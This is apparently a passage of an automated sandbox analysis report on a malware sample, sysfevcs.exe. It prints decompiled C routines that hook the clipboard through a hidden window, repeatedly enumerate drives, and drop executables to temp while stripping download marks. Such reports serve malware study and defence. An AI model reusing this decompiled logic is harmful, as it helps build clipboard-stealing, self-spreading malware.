                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 3135114409-2302825242
                                                                                                                                                                                                                                                                  • Opcode ID: 3fb54ee1c98c202d18de21e5761f9d1515a3ec0a97735e455a5343831f3eee50
                                                                                                                                                                                                                                                                  • Instruction ID: ca6c14ff5b50aa8784996ad2499aaf2eb04ac4ca7c8f7d7d042f209e4fd4e3d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb54ee1c98c202d18de21e5761f9d1515a3ec0a97735e455a5343831f3eee50
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4091D7B1901314ABEB30DB50CC45FAA7379AF88305F0085F9F609B51C2DA789A88CF69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 102 403ed0-403ef2 GetWindowLongW 103 403ef4-403efb 102->103 104 403f16-403f1d 102->104 105 403f01-403f05 103->105 106 403f87-403f98 IsClipboardFormatAvailable 103->106 107 403f46-403f4c 104->107 108 403f1f 104->108 111 403f24-403f41 SetClipboardViewer SetWindowLongW 105->111 112 403f07-403f0b 105->112 109 403fa3-403fad IsClipboardFormatAvailable 106->109 110 403f9a-403fa1 106->110 114 403f66-403f6a 107->114 115 403f4e-403f64 SetWindowLongW 107->115 113 404104-40411d DefWindowProcA 108->113 117 403fb8-403fc2 IsClipboardFormatAvailable 109->117 118 403faf-403fb6 109->118 116 403fcb-403fcf 110->116 111->113 119 403f11 112->119 120 4040bd-4040fe RegisterRawInputDevices ChangeClipboardChain 112->120 121 403f82 114->121 122 403f6c-403f7c SendMessageA 114->122 115->121 124 403fd5-403fdf OpenClipboard 116->124 125 40409f-4040a3 116->125 117->116 123 403fc4 117->123 118->116 119->113 120->113 121->113 122->121 123->116 124->125 126 403fe5-403ff6 GetClipboardData 124->126 127 4040a5-4040b5 SendMessageA 125->127 128 4040bb 125->128 129 403ff8 126->129 130 403ffd-40400e GlobalLock 126->130 127->128 128->113 129->113 131 404010 130->131 132 404015-404026 130->132 131->113 133 404028-40402c 132->133 134 404049-40405c call 403ce0 132->134 136 40405e-40406e call 403e00 133->136 137 40402e-404032 133->137 143 404071-404085 GlobalUnlock CloseClipboard 134->143 136->143 140 404034 137->140 141 404036-404047 call 403c20 137->141 140->143 141->143 143->125 146 404087-40409c call 403480 call 408990 143->146 146->125
                                                                                                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                                                                                                  			E00403ED0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				int _v12;
                                                                                                                                                                                                                                                                  				struct HWND__* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				int _v32;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				int _v40;
                                                                                                                                                                                                                                                                  				int _v44;
                                                                                                                                                                                                                                                                  				long _t75;
                                                                                                                                                                                                                                                                  				struct HWND__* _t90;
                                                                                                                                                                                                                                                                  				struct HWND__* _t97;
                                                                                                                                                                                                                                                                  				struct HWND__* _t98;
                                                                                                                                                                                                                                                                  				void* _t129;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                  				_v40 = _a8;
                                                                                                                                                                                                                                                                  				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                  					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                  						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v8 = _a16;
                                                                                                                                                                                                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L38;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L38:
                                                                                                                                                                                                                                                                  						_t75 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                  						return _t75;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                  								_v12 = 7;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v12 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v12 = 0xd;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                  						L34:
                                                                                                                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                                                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                                                                                                                                  							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                  							if(_v20 != 0) {
                                                                                                                                                                                                                                                                  								_v16 = 0;
                                                                                                                                                                                                                                                                  								_v44 = _v12;
                                                                                                                                                                                                                                                                  								if(_v44 == 1) {
                                                                                                                                                                                                                                                                  									_t90 = E00403CE0(_v20, 0, 0);
                                                                                                                                                                                                                                                                  									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  									_v16 = _t90;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									if(_v44 == 7) {
                                                                                                                                                                                                                                                                  										_t97 = E00403E00(_v20, 0, 0);
                                                                                                                                                                                                                                                                  										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  										_v16 = _t97;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                  											_t98 = E00403C20(_v20, _v20, 0);
                                                                                                                                                                                                                                                                  											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                  											_v16 = _t98;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                  								CloseClipboard();
                                                                                                                                                                                                                                                                  								if(_v16 != 0) {
                                                                                                                                                                                                                                                                  									E00403480(_v16);
                                                                                                                                                                                                                                                                  									E00408990(_v16);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L38;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 1) {
                                                                                                                                                                                                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(_v40 == 2) {
                                                                                                                                                                                                                                                                  						_v36 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 1;
                                                                                                                                                                                                                                                                  						_v34 = 6;
                                                                                                                                                                                                                                                                  						_v32 = 1;
                                                                                                                                                                                                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L38;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x00403ee2
                                                                                                                                                                                                                                                                  0x00403ee8
                                                                                                                                                                                                                                                                  0x00403ef2
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403f4c
                                                                                                                                                                                                                                                                  0x00403f6a
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f4e
                                                                                                                                                                                                                                                                  0x00403f51
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403f1f
                                                                                                                                                                                                                                                                  0x00404104
                                                                                                                                                                                                                                                                  0x00404114
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403efb
                                                                                                                                                                                                                                                                  0x00403f87
                                                                                                                                                                                                                                                                  0x00403f98
                                                                                                                                                                                                                                                                  0x00403fad
                                                                                                                                                                                                                                                                  0x00403fc2
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x0040409f
                                                                                                                                                                                                                                                                  0x004040a3
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x00403fe5
                                                                                                                                                                                                                                                                  0x00403fef
                                                                                                                                                                                                                                                                  0x00403ff6
                                                                                                                                                                                                                                                                  0x00404007
                                                                                                                                                                                                                                                                  0x0040400e
                                                                                                                                                                                                                                                                  0x00404015
                                                                                                                                                                                                                                                                  0x0040401f
                                                                                                                                                                                                                                                                  0x00404026
                                                                                                                                                                                                                                                                  0x00404051
                                                                                                                                                                                                                                                                  0x00404056
                                                                                                                                                                                                                                                                  0x00404059
                                                                                                                                                                                                                                                                  0x00404028
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404066
                                                                                                                                                                                                                                                                  0x0040406b
                                                                                                                                                                                                                                                                  0x0040406e
                                                                                                                                                                                                                                                                  0x0040402e
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040403c
                                                                                                                                                                                                                                                                  0x00404041
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404075
                                                                                                                                                                                                                                                                  0x0040407b
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x0040408b
                                                                                                                                                                                                                                                                  0x00404097
                                                                                                                                                                                                                                                                  0x0040409c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404010
                                                                                                                                                                                                                                                                  0x00403ff8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x00403f05
                                                                                                                                                                                                                                                                  0x00403f2e
                                                                                                                                                                                                                                                                  0x00403f3b
                                                                                                                                                                                                                                                                  0x00403f07
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x004040bf
                                                                                                                                                                                                                                                                  0x004040c5
                                                                                                                                                                                                                                                                  0x004040c8
                                                                                                                                                                                                                                                                  0x004040cb
                                                                                                                                                                                                                                                                  0x004040d4
                                                                                                                                                                                                                                                                  0x004040dd
                                                                                                                                                                                                                                                                  0x004040e1
                                                                                                                                                                                                                                                                  0x004040f0
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403EDC
                                                                                                                                                                                                                                                                  • SetClipboardViewer.USER32(?), ref: 00403F28
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00403F3B
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403F90
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00403FD7
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 00403FE9
                                                                                                                                                                                                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 004040F0
                                                                                                                                                                                                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 004040FE
                                                                                                                                                                                                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00404114
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8b872be4cb4d748bd76246840cde2d40408250e99aa395a8da3a751cbb9e336b
                                                                                                                                                                                                                                                                  • Instruction ID: 96edcc278ed0497f99117f545b7404bf08a66114077c170e205bfa907dcbbdbe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b872be4cb4d748bd76246840cde2d40408250e99aa395a8da3a751cbb9e336b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C714EB5900209EFDB14DFA4C988BAE7BB8AF48301F14453AF605BB2D0D7789E44CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                                                                                                                                  			E004051D0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v556;
                                                                                                                                                                                                                                                                  				short _v2604;
                                                                                                                                                                                                                                                                  				intOrPtr _v2608;
                                                                                                                                                                                                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                  				long _v2616;
                                                                                                                                                                                                                                                                  				short _v3148;
                                                                                                                                                                                                                                                                  				intOrPtr _v3152;
                                                                                                                                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t36;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				struct %anon54 _t43;
                                                                                                                                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                                                                                                                                  				void* _t68;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				void* _t70;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  				GetModuleFileNameW(0, L"C:\\Windows\\sysfevcs.exe", 0x104);
                                                                                                                                                                                                                                                                  				_t34 = E0040CEA0(L"C:\\Windows\\sysfevcs.exe"); // executed
                                                                                                                                                                                                                                                                  				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                  				 *0x412f70 = _t34;
                                                                                                                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                                                                                                                  					_t36 = E004049E0(); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t36;
                                                                                                                                                                                                                                                                  					_v12 = 2;
                                                                                                                                                                                                                                                                  					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                  						_t38 = E00404980(_v8, _v12,  &_v24); // executed
                                                                                                                                                                                                                                                                  						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                  						_v16 = _t38;
                                                                                                                                                                                                                                                                  						_v3152 = _v16;
                                                                                                                                                                                                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0x40000000);
                                                                                                                                                                                                                                                                  							_t63 = _v2608;
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                  							_push(_t43);
                                                                                                                                                                                                                                                                  							L0040EB30();
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                  							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                  								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                  							E00404CF0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                  							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x004051de
                                                                                                                                                                                                                                                                  0x004051f0
                                                                                                                                                                                                                                                                  0x004051fb
                                                                                                                                                                                                                                                                  0x00405200
                                                                                                                                                                                                                                                                  0x00405203
                                                                                                                                                                                                                                                                  0x00405208
                                                                                                                                                                                                                                                                  0x00405215
                                                                                                                                                                                                                                                                  0x0040521a
                                                                                                                                                                                                                                                                  0x0040521d
                                                                                                                                                                                                                                                                  0x0040522f
                                                                                                                                                                                                                                                                  0x00405245
                                                                                                                                                                                                                                                                  0x0040524a
                                                                                                                                                                                                                                                                  0x0040524d
                                                                                                                                                                                                                                                                  0x00405253
                                                                                                                                                                                                                                                                  0x00405260
                                                                                                                                                                                                                                                                  0x0040528f
                                                                                                                                                                                                                                                                  0x004052a4
                                                                                                                                                                                                                                                                  0x004052aa
                                                                                                                                                                                                                                                                  0x004052ac
                                                                                                                                                                                                                                                                  0x004052b1
                                                                                                                                                                                                                                                                  0x004052b7
                                                                                                                                                                                                                                                                  0x004052b8
                                                                                                                                                                                                                                                                  0x004052be
                                                                                                                                                                                                                                                                  0x004052bf
                                                                                                                                                                                                                                                                  0x004052c4
                                                                                                                                                                                                                                                                  0x004052d2
                                                                                                                                                                                                                                                                  0x004052d8
                                                                                                                                                                                                                                                                  0x004052e4
                                                                                                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x00405315
                                                                                                                                                                                                                                                                  0x0040533b
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040535a

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 004051DE
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysfevcs.exe,00000104), ref: 004051F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: CreateFileW.KERNELBASE(00405200,80000000,00000001,00000000,00000003,00000000,00000000,00405200), ref: 0040CEC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CED5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040CEE2
                                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0040535A
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegCloseKey.KERNELBASE(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0040534D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404980: lstrcpyW.KERNEL32 ref: 004049D3
                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040528F
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 004052A4
                                                                                                                                                                                                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 004052BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052D2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052F2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405315
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                  • String ID: (%dGB)$%s%s$C:\Windows\sysfevcs.exe$Unnamed volume
                                                                                                                                                                                                                                                                  • API String ID: 899515741-3254714485
                                                                                                                                                                                                                                                                  • Opcode ID: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction ID: ed61c20226ee7d10f6afdc96e326cade5679569eb23418b562d9eee10a8c52da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24416471900218ABEB24DB94DD45FEF7378AF44700F1041BAF209B55D1DAB45A88CF6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E00404120() {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				struct tagMSG _v36;
                                                                                                                                                                                                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                  				short _v596;
                                                                                                                                                                                                                                                                  				unsigned int _t20;
                                                                                                                                                                                                                                                                  				struct HWND__* _t27;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  				void* _t40;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                  					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                  					_v84.lpfnWndProc = E00403ED0;
                                                                                                                                                                                                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						Sleep(1); // executed
                                                                                                                                                                                                                                                                  						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                  						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                  					_t27 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t27;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                  							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                  							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  				} while (0 != 0);
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404138
                                                                                                                                                                                                                                                                  0x0040413d
